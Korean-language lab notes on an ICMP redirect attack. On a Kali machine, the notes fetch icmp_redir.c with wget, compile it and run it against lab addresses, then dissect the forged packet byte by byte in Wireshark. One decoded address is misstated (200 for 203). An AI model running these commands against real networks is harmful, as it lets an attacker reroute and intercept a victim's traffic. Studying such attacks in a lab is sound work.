icmp redirect

예) 공격자가 대상 컴퓨터에 naver로 통신하는건 라우터말고 나를 거쳐서 통신해! 라는거

 

 

icmp_redir 사용

icmp_redir [게이트웨이] [공격 대상] [외부] [공격자주소]

 

 

kali

wget 192.168.10.11/data/down/security/icmp_redir.c

gcc -o icmp_redir icmp_redir.c

./icmp_redir 192.168.11.1 192.168.11.7 203.248.252.2 192.168.11.36

 

window xp

ping 203.248.252.2

route print

203.248.252.2가 떠야한다.

 

 

와이어샤크로 패킷분석

 

00 0c 29 63 9f d0 00 0c 29 c6 9f c0 08 00 45 00

00 38 0c 1b 00 00 40 01 d7 51 c0 a8 0b 01 c0 a8

0b 07 05 01 2f 32 c0 a8 0b 24 45 00 00 38 0c 1b

00 00 40 00 db 00 c0 a8 0b 07 cb f8 fc 02 00 00

00 00 00 00 00 00

ETHERNET

Dest MAC Add (6 byte) : 00 0c 29 63 9f d0

Sour MAC Add (6 byte) : 00 0c 29 c6 9f c0

Type (2 byte) : 0800 (ipv4)

 

IP

Version(4bit)+헤더길이(4bit): 45 00

TOS(1byte): 00

전체길이(2byte): 00 38 (56 byte)

Identification(2byte): 0c 1b

Flag(3bit)+Fragment Offset(13bit) : 00 00 (000 0000000000000)

TTL(1byte) : 40 (64)

Protocol(1byte) : 01 (ICMP)

Header Checksum (2byte) :d7 51 (1101 0111 0101 0001)

Source IP(4byte): c0 a8 0b 01 (192.168.11.1)

Destination IP(4byte):c0 a8 0b 07(192.168.11.7)

 

ICMP

Type(1 byte) + Code(1 byte) : 05 01 (Redirect, 호스트 경로 재지정)

Checksum(2 byte) : 2f 32 (0010 1111 0011 0010)

새로운게이트웨이주소(4 byte) : c0 a8 0b 24 (192.168.11.36)

IP header (12 byte) : 45 00 00 38 0c 1b 00 00 40 00 db 00

Source IP(4byte) : c0 a8 0b 07 (192.168.11.7)

Destination IP(4byte) : cb f8 fc 02 (200.248.252.2)

Data : 00 00 00 00 00 00 00 00

 

이 패킷은 192.168.11.1이 192.168.11.7에게 보낸 icmp redirect 메시지입니다. 앞으로 203.248.252.2로 가려는 패킷은 192.168.11.1로 보내지말고, 192.168.11.36으로 보내라는 메시지 입니다.